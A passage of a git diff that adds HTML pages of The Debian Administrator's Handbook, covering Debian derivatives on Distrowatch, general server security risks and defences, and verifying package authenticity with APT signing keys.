+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Live CD, Specificities, Particular Choices" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="derivative-distributions.html"
+        title="Příloha A. Derivative Distributions" /><link
+        rel="prev"
+        href="sect.raspbian.html"
+        title="A.12. Raspbian" /><link
+        rel="next"
+        href="short-remedial-course.html"
+        title="Příloha B. Short Remedial Course" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.other-derivatives.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.raspbian.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="short-remedial-course.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.other-derivatives"></a>A.13. And Many More</h2></div></div></div><a
+          id="id-1.20.16.2"
+          class="indexterm"></a><div
+          class="para">
+			The Distrowatch website references a huge number of Linux distributions, many of which are based on Debian. Browsing this site is a great way to get a sense of the diversity in the Free Software world. <div
+            xmlns=""
+            class="url">→ <a
+              xmlns="http://www.w3.org/1999/xhtml"
+              href="http://distrowatch.com">http://distrowatch.com</a></div>
+		</div><div
+          class="para">
+			The search form can help track down a distribution based on its ancestry. In March 2015, selecting Debian led to 131 active distributions! <div
+            xmlns=""
+            class="url">→ <a
+              xmlns="http://www.w3.org/1999/xhtml"
+              href="http://distrowatch.com/search.php">http://distrowatch.com/search.php</a></div>
+		</div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.raspbian.html"><strong>Předcházející</strong>A.12. Raspbian</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="short-remedial-course.html"><strong>Další</strong>Příloha B. Short Remedial Course</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.other-security-considerations.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.other-security-considerations.html
new file mode 100644
index 000000000..c2fd9816c
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.other-security-considerations.html
@@ -0,0 +1,254 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">14.6. Other Security-Related Considerations</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Firewall, Netfilter, IDS/NIDS" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="security.html"
+        title="Kapitola 14. Security" /><link
+        rel="prev"
+        href="sect.selinux.html"
+        title="14.5. Introduction to SELinux" /><link
+        rel="next"
+        href="sect.dealing-with-compromised-machine.html"
+        title="14.7. Dealing with a Compromised Machine" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.other-security-considerations.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.selinux.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.dealing-with-compromised-machine.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.other-security-considerations"></a>14.6. Other Security-Related Considerations</h2></div></div></div><div
+          class="para">
+			Security is not just a technical problem; more than anything, it is about good practices and understanding the risks. This section reviews some of the more common risks, as well as a few best practices which should, depending on the case, increase security or lessen the impact of a successful attack.
+		</div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.17.9.3"></a>14.6.1. Inherent Risks of Web Applications</h3></div></div></div><div
+            class="para">
+				The universal character of web applications led to their proliferation. Several are often run in parallel: a webmail, a wiki, some groupware system, forums, a photo gallery, a blog, and so on. Many of those applications rely on the “LAMP” (<span
+              class="emphasis"><em>Linux, Apache, MySQL, PHP</em></span>) stack. Unfortunately, many of those applications were also written without much consideration for security problems. Data coming from outside is, too often, used with little or no validation. Providing specially-crafted values can be used to subvert a call to a command so that another one is executed instead. Many of the most obvious problems have been fixed as time has passed, but new security problems pop up regularly.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>VOCABULARY</em></span> SQL injection</strong></p></div></div></div><div
+              class="para">
+				When a program inserts data into SQL queries in an insecure manner, it becomes vulnerable to SQL injections; this name covers the act of changing a parameter in such a way that the actual query executed by the program is different from the intended one, either to damage the database or to access data that should normally not be accessible. <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="http://en.wikipedia.org/wiki/SQL_Injection">http://en.wikipedia.org/wiki/SQL_Injection</a></div>
+			</div><a
+              id="id-1.17.9.3.3.3"
+              class="indexterm"></a></div><div
+            class="para">
+				Updating web applications regularly is therefore a must, lest any cracker (whether a professional attacker or a script kiddy) can exploit a known vulnerability. The actual risk depends on the case, and ranges from data destruction to arbitrary code execution, including web site defacement.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.17.9.4"></a>14.6.2. Knowing What To Expect</h3></div></div></div><div
+            class="para">
+				A vulnerability in a web application is often used as a starting point for cracking attempts. What follows is a short review of possible consequences.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>QUICK LOOK</em></span> Filtering HTTP queries</strong></p></div></div></div><div
+              class="para">
+				Apache 2 includes modules allowing filtering incoming HTTP queries. This allows blocking some attack vectors. For instance, limiting the length of parameters can prevent buffer overflows. More generally, one can validate parameters before they are even passed to the web application and restrict access along many criteria. This can even be combined with dynamic firewall updates, so that a client infringing one of the rules is banned from accessing the web server for a given period of time.
+			</div><div
+              class="para">
+				Setting up these checks can be a long and cumbersome task, but it can pay off when the web application to be deployed has a dubious track record where security is concerned.
+			</div><div
+              class="para">
+				<span
+                class="emphasis"><em>mod-security2</em></span> (in the <span
+                class="pkg pkg">libapache2-mod-security2</span> package) is the main such module. It even comes with many ready-to-use rules of its own (in the <span
+                class="pkg pkg">modsecurity-crs</span> package) that you can easily enable.
+			</div><a
+              id="id-1.17.9.4.3.5"
+              class="indexterm"></a><a
+              id="id-1.17.9.4.3.6"
+              class="indexterm"></a></div><div
+            class="para">
+				The consequences of an intrusion will have various levels of obviousness depending on the motivations of the attacker. <span
+              class="emphasis"><em>Script-kiddies</em></span> only apply recipes they find on web sites; most often, they deface a web page or delete data. In more subtle cases, they add invisible contents to web pages so as to improve referrals to their own sites in search engines.
+			</div><div
+            class="para">
+				A more advanced attacker will go beyond that. A disaster scenario could go on in the following fashion: the attacker gains the ability to execute commands as the <code
+              class="literal">www-data</code> user, but executing a command requires many manipulations. To make their life easier, they install other web applications specially designed to remotely execute many kinds of commands, such as browsing the filesystem, examining permissions, uploading or downloading files, executing commands, and even provide a network shell. Often, the vulnerability will allow running a <code
+              class="command">wget</code> command that will download some malware into <code
+              class="filename">/tmp/</code>, then executing it. The malware is often downloaded from a foreign website that was previously compromised, in order to cover tracks and make it harder to find out the actual origin of the attack.
+			</div><div
+            class="para">
+				At this point, the attacker has enough freedom of movement that they often install an IRC <span
+              class="emphasis"><em>bot</em></span> (a robot that connects to an IRC server and can be controlled by this channel). This bot is often used to share illegal files (unauthorized copies of movies or software, and so on). A determined attacker may want to go even further. The <code
+              class="literal">www-data</code> account does not allow full access to the machine, and the attacker will try to obtain administrator privileges. Now, this should not be possible, but if the web application was not up-to-date, chances are that the kernel and other programs are outdated too; this sometimes follows a decision from the administrator who, despite knowing about the vulnerability, neglected to upgrade the system since there are no local users. The attacker can then take advantage of this second vulnerability to get root access.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>VOCABULARY</em></span> Privilege escalation</strong></p></div></div></div><div
+              class="para">
+				This term covers anything that can be used to obtain more permissions than a given user should normally have. The <code
+                class="command">sudo</code> program is designed for precisely the purpose of giving administrative rights to some users. But the same term is also used to describe the act of an attacker exploiting a vulnerability to obtain undue rights.
+			</div></div><div
+            class="para">
+				Now the attacker owns the machine; they will usually try to keep this privileged access for as long as possible. This involves installing a <span
+              class="emphasis"><em>rootkit</em></span>, a program that will replace some components of the system so that the attacker will be able to obtain the administrator privileges again at a later time; the rootkit also tries hiding its own existence as well as any traces of the intrusion. A subverted <code
+              class="command">ps</code> program will omit to list some processes, <code
+              class="command">netstat</code> will not list some of the active connections, and so on. Using the root permissions, the attacker was able to observe the whole system, but didn't find important data; so they will try accessing other machines in the corporate network. Analyzing the administrator's account and the history files, the attacker finds what machines are routinely accessed. By replacing <code
+              class="command">sudo</code> or <code
+              class="command">ssh</code> with a subverted program, the attacker can intercept some of the administrator's passwords, which they will use on the detected servers… and the intrusion can propagate from then on.
+			</div><div
+            class="para">
+				This is a nightmare scenario which can be prevented by several measures. The next few sections describe some of these measures.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.choosing-the-software-wisely"></a>14.6.3. Choosing the Software Wisely</h3></div></div></div><div
+            class="para">
+				Once the potential security problems are known, they must be taken into account at each step of the process of deploying a service, especially when choosing the software to install. Many web sites, such as <code
+              class="literal">SecurityFocus.com</code>, keep a list of recently-discovered vulnerabilities, which can give an idea of a security track record before some particular software is deployed. Of course, this information must be balanced against the popularity of said software: a more widely-used program is a more tempting target, and it will be more closely scrutinized as a consequence. On the other hand, a niche program may be full of security holes that never get publicized due to a lack of interest in a security audit.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>VOCABULARY</em></span> Security audit</strong></p></div></div></div><div
+              class="para">
+				A security audit is the process of thoroughly reading and analyzing the source code of some software, looking for potential security vulnerabilities it could contain. Such audits are usually proactive and they are conducted to ensure a program meets certain security requirements.
+			</div></div><div
+            class="para">
+				In the Free Software world, there is generally ample room for choice, and choosing one piece of software over another should be a decision based on the criteria that apply locally. More features imply an increased risk of a vulnerability hiding in the code; picking the most advanced program for a task may actually be counter-productive, and a better approach is usually to pick the simplest program that meets the requirements.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>VOCABULARY</em></span> Zero-day exploit</strong></p></div></div></div><div
+              class="para">
+				A <span
+                class="emphasis"><em>zero-day exploit</em></span> attack is hard to prevent; the term covers a vulnerability that is not yet known to the authors of the program.
+			</div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.managing-a-machine-as-a-whole"></a>14.6.4. Managing a Machine as a Whole</h3></div></div></div><div
+            class="para">
+				Most Linux distributions install by default a number of Unix services and many tools. In many cases, these services and tools are not required for the actual purposes for which the administrator set up the machine. As a general guideline in security matters, unneeded software is best uninstalled. Indeed, there is no point in securing an FTP server, if a vulnerability in a different, unused service can be used to get administrator privileges on the whole machine.
+			</div><div
+            class="para">
+				By the same reasoning, firewalls will often be configured to only allow access to services that are meant to be publicly accessible.
+			</div><div
+            class="para">
+				Current computers are powerful enough to allow hosting several services on the same physical machine. From an economic viewpoint, such a possibility is interesting: only one computer to administrate, lower energy consumption, and so on. From the security point of view, however, such a choice can be a problem. One compromised service can bring access to the whole machine, which in turn compromises the other services hosted on the same computer. This risk can be mitigated by isolating the services. This can be attained either with virtualization (each service being hosted in a dedicated virtual machine or container), or with AppArmor/SELinux (each service daemon having an adequately designed set of permissions).
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.users-are-players"></a>14.6.5. Users Are Players</h3></div></div></div><div
+            class="para">
+				Discussing security immediately brings to mind protection against attacks by anonymous crackers hiding in the Internet jungle; but an often-forgotten fact is that risks also come from inside: an employee about to leave the company could download sensitive files on the important projects and sell them to competitors, a negligent salesman could leave their desk without locking their session during a meeting with a new prospect, a clumsy user could delete the wrong directory by mistake, and so on.
+			</div><div
+            class="para">
+				The response to these risks can involve technical solutions: no more than the required permissions should be granted to users, and regular backups are a must. But in many cases, the appropriate protection is going to involve training users to avoid the risks.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>QUICK LOOK</em></span> <span
+                        class="pkg pkg">autolog</span></strong></p></div></div></div><div
+              class="para">
+				The <span
+                class="pkg pkg">autolog</span> package provides a program that automatically disconnects inactive users after a configurable delay. It also allows killing user processes that persist after a session ends, thereby preventing users from running daemons.
+			</div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.physical-security"></a>14.6.6. Physical Security</h3></div></div></div><div
+            class="para">
+				There is no point in securing the services and networks if the computers themselves are not protected. Important data deserve being stored on hot-swappable hard disks in RAID arrays, because hard disks fail eventually and data availability is a must. But if any pizza delivery boy can enter the building, sneak into the server room and run away with a few selected hard disks, an important part of security is not fulfilled. Who can enter the server room? Is access monitored? These questions deserve consideration (and an answer) when physical security is being evaluated.
+			</div><div
+            class="para">
+				Physical security also includes taking into consideration the risks for accidents such as fires. This particular risk is what justifies storing the backup media in a separate building, or at least in a fire-proof strongbox.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.17.9.9"></a>14.6.7. Legal Liability</h3></div></div></div><div
+            class="para">
+				An administrator is, more or less implicitly, trusted by their users as well as the users of the network in general. They should therefore avoid any negligence that malevolent people could exploit.
+			</div><div
+            class="para">
+				An attacker taking control of your machine then using it as a forward base (known as a “relay system”) from which to perform other nefarious activities could cause legal trouble for you, since the attacked party would initially see the attack coming from your system, and therefore consider you as the attacker (or as an accomplice). In many cases, the attacker will use your server as a relay to send spam, which shouldn't have much impact (except potentially registration on black lists that could restrict your ability to send legitimate emails), but won't be pleasant nevertheless. In other cases, more important trouble can be caused from your machine, for instance denial of service attacks. This will sometimes induce loss of revenue, since the legitimate services will be unavailable and data can be destroyed; sometimes this will also imply a real cost, because the attacked party can start legal proceedings against you. Rights-holders can sue you if an unauthorized copy of a work protected by copyright law is shared from your server, as well as other companies compelled by service level agreements if they are bound to pay penalties following the attack from your machine.
+			</div><div
+            class="para">
+				When these situations occur, claiming innocence is not usually enough; at the very least, you will need convincing evidence showing suspect activity on your system coming from a given IP address. This won't be possible if you neglect the recommendations of this chapter and let the attacker obtain access to a privileged account (root, in particular) and use it to cover their tracks.
+			</div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.selinux.html"><strong>Předcházející</strong>14.5. Introduction to SELinux</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.dealing-with-compromised-machine.html"><strong>Další</strong>14.7. Dealing with a Compromised Machine</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.package-authentication.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.package-authentication.html
new file mode 100644
index 000000000..292cc514a
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.package-authentication.html
@@ -0,0 +1,197 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">6.5. Checking Package Authenticity</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="apt, apt-get, apt-cache, aptitude, synaptic, sources.list, apt-cdrom" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="apt.html"
+        title="Kapitola 6. Maintenance and Updates: The APT Tools" /><link
+        rel="prev"
+        href="sect.apt-frontends.html"
+        title="6.4. Frontends: aptitude, synaptic" /><link
+        rel="next"
+        href="sect.dist-upgrade.html"
+        title="6.6. Upgrading from One Stable Distribution to the Next" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.package-authentication.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.apt-frontends.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.dist-upgrade.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.package-authentication"></a>6.5. Checking Package Authenticity</h2></div></div></div><a
+          id="id-1.9.14.2"
+          class="indexterm"></a><a
+          id="id-1.9.14.3"
+          class="indexterm"></a><a
+          id="id-1.9.14.4"
+          class="indexterm"></a><a
+          id="id-1.9.14.5"
+          class="indexterm"></a><a
+          id="id-1.9.14.6"
+          class="indexterm"></a><div
+          class="para">
+			Security is very important for Falcot Corp administrators. Accordingly, they need to ensure that they only install packages which are guaranteed to come from Debian with no tampering on the way. A computer cracker could try to add malicious code to an otherwise legitimate package. Such a package, if installed, could do anything the cracker designed it to do, including for instance disclosing passwords or confidential information. To circumvent this risk, Debian provides a tamper-proof seal to guarantee — at install time — that a package really comes from its official maintainer and hasn't been modified by a third party.
+		</div><div
+          class="para">
+			The seal works with a chain of cryptographical hashes and a signature. The signed file is the <code
+            class="filename">Release</code> file, provided by the Debian mirrors. It contains a list of the <code
+            class="filename">Packages</code> files (including their compressed forms, <code
+            class="filename">Packages.gz</code> and <code
+            class="filename">Packages.xz</code>, and the incremental versions), along with their MD5, SHA1 and SHA256 hashes, which ensures that the files haven't been tampered with. These <code
+            class="filename">Packages</code> files contain a list of the Debian packages available on the mirror, along with their hashes, which ensures in turn that the contents of the packages themselves haven't been altered either.
+		</div><a
+          id="id-1.9.14.9"
+          class="indexterm"></a><a
+          id="id-1.9.14.10"
+          class="indexterm"></a><a
+          id="id-1.9.14.11"
+          class="indexterm"></a><a
+          id="id-1.9.14.12"
+          class="indexterm"></a><div
+          class="para">
+			APT needs a set of trusted GnuPG public keys to verify signatures in the <code
+            class="filename">Release.gpg</code> files available on the mirrors. It gets them from files in <code
+            class="filename">/etc/apt/trusted.gpg.d/</code> and from the <code
+            class="filename">/etc/apt/trusted.gpg</code> keyring (managed by the <code
+            class="command">apt-key</code> command). The official Debian keys are provided and kept up-to-date by the <span
+            class="pkg pkg">debian-archive-keyring</span> package which puts them in <code
+            class="filename">/etc/apt/trusted.gpg.d/</code>. Note however that the first installation of this particular package requires caution: even if the package is signed like any other, the signature cannot be verified externally. Cautious administrators should therefore check the fingerprints of imported keys before trusting them to install new packages:
+		</div><pre
+          class="screen scale"># <strong
+            class="userinput"><code>apt-key fingerprint</code></strong>
+/etc/apt/trusted.gpg.d/debian-archive-jessie-automatic.gpg
+----------------------------------------------------------
+pub   rsa4096 2014-11-21 [SC] [expires: 2022-11-19]
+      126C 0D24 BD8A 2942 CC7D  F8AC 7638 D044 2B90 D010
+uid           [ unknown] Debian Archive Automatic Signing Key (8/jessie) &lt;ftpmaster@debian.org&gt;
+
+/etc/apt/trusted.gpg.d/debian-archive-jessie-security-automatic.gpg
+-------------------------------------------------------------------
+pub   rsa4096 2014-11-21 [SC] [expires: 2022-11-19]
+      D211 6914 1CEC D440 F2EB  8DDA 9D6D 8F6B C857 C906
+uid           [ unknown] Debian Security Archive Automatic Signing Key (8/jessie) &lt;ftpmaster@debian.org&gt;
+
+/etc/apt/trusted.gpg.d/debian-archive-jessie-stable.gpg
+-------------------------------------------------------
+pub   rsa4096 2013-08-17 [SC] [expires: 2021-08-15]
+      75DD C3C4 A499 F1A1 8CB5  F3C8 CBF8 D6FD 518E 17E1
+uid           [ unknown] Jessie Stable Release Key &lt;debian-release@lists.debian.org&gt;
+
+/etc/apt/trusted.gpg.d/debian-archive-stretch-automatic.gpg
+-----------------------------------------------------------
+pub   rsa4096 2017-05-22 [SC] [expires: 2025-05-20]
+      E1CF 20DD FFE4 B89E 8026  58F1 E0B1 1894 F66A EC98
+uid           [ unknown] Debian Archive Automatic Signing Key (9/stretch) &lt;ftpmaster@debian.org&gt;
+sub   rsa4096 2017-05-22 [S] [expires: 2025-05-20]
+
+/etc/apt/trusted.gpg.d/debian-archive-stretch-security-automatic.gpg
+--------------------------------------------------------------------
+pub   rsa4096 2017-05-22 [SC] [expires: 2025-05-20]
+      6ED6 F5CB 5FA6 FB2F 460A  E88E EDA0 D238 8AE2 2BA9
+uid           [ unknown] Debian Security Archive Automatic Signing Key (9/stretch) &lt;ftpmaster@debian.org&gt;
+sub   rsa4096 2017-05-22 [S] [expires: 2025-05-20]
+
+/etc/apt/trusted.gpg.d/debian-archive-stretch-stable.gpg
+--------------------------------------------------------
+pub   rsa4096 2017-05-20 [SC] [expires: 2025-05-18]
+      067E 3C45 6BAE 240A CEE8  8F6F EF0F 382A 1A7B 6500
+uid           [ unknown] Debian Stable Release Key (9/stretch) &lt;debian-release@lists.debian.org&gt;
+
+/etc/apt/trusted.gpg.d/debian-archive-wheezy-automatic.gpg
+----------------------------------------------------------
+pub   rsa4096 2012-04-27 [SC] [expires: 2020-04-25]
+      A1BD 8E9D 78F7 FE5C 3E65  D8AF 8B48 AD62 4692 5553
+uid           [ unknown] Debian Archive Automatic Signing Key (7.0/wheezy) &lt;ftpmaster@debian.org&gt;
+
+/etc/apt/trusted.gpg.d/debian-archive-wheezy-stable.gpg
+-------------------------------------------------------
+pub   rsa4096 2012-05-08 [SC] [expires: 2019-05-07]
+      ED6D 6527 1AAC F0FF 15D1  2303 6FB2 A1C2 65FF B764
+uid           [ unknown] Wheezy Stable Release Key &lt;debian-release@lists.debian.org&gt;
+</pre><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>IN PRACTICE</em></span> Adding trusted keys</strong></p></div></div></div><a
+            id="id-1.9.14.15.2"
+            class="indexterm"></a><a
+            id="id-1.9.14.15.3"
+            class="indexterm"></a><div
+            class="para">
+			When a third-party package source is added to the <code
+              class="filename">sources.list</code> file, APT needs to be told to trust the corresponding GPG authentication key (otherwise it will keep complaining that it can't ensure the authenticity of the packages coming from that repository). The first step is of course to get the public key. More often than not, the key will be provided as a small text file, which we will call <code
+              class="filename">key.asc</code> in the following examples.
+		</div><div
+            class="para">
+			To add the key to the trusted keyring, the administrator can just put it in a <code
+              class="filename">*.asc</code> file in <code
+              class="filename">/etc/apt/trusted.gpg.d/</code>. This is supported since Debian <span
+              class="distribution distribution">Stretch</span>. With older releases, you had to run <code
+              class="command">apt-key add &lt; key.asc</code>.
+		</div><a
+            id="id-1.9.14.15.6"
+            class="indexterm"></a><div
+            class="para">
+			For people who would want a dedicated application and more details on the trusted keys, it is possible to use <code
+              class="command">gui-apt-key</code> (in the package of the same name), a small graphical user interface which manages the trusted keyring.
+		</div></div><div
+          class="para">
+			Once the appropriate keys are in the keyring, APT will check the signatures before any risky operation, so that front-ends will display a warning if asked to install a package whose authenticity can't be ascertained.
+		</div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.apt-frontends.html"><strong>Předcházející</strong>6.4. Frontends: aptitude, synaptic</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.dist-upgrade.html"><strong>Další</strong>6.6. Upgrading from One Stable Distribution to th...</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.package-meta-information.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.package-meta-information.html
new file mode 100644
index 000000000..7314ef0b9
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.package-meta-information.html
@@ -0,0 +1,821 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">5.2. Package Meta-Information</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Binary package, Source package, dpkg, dependencies, conflict" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="packaging-system.html"
+        title="Kapitola 5. Packaging System: Tools and Fundamental Principles" /><link
+        rel="prev"
+        href="packaging-system.html"
+        title="Kapitola 5. Packaging System: Tools and Fundamental Principles" /><link
+        rel="next"
+        href="sect.source-package-structure.html"
+        title="5.3. Structure of a Source Package" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.package-meta-information.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="packaging-system.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.source-package-structure.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.package-meta-information"></a>5.2. Package Meta-Information</h2></div></div></div><a
+          id="id-1.8.6.2"
+          class="indexterm"></a><a
+          id="id-1.8.6.3"
+          class="indexterm"></a><div
+          class="para">
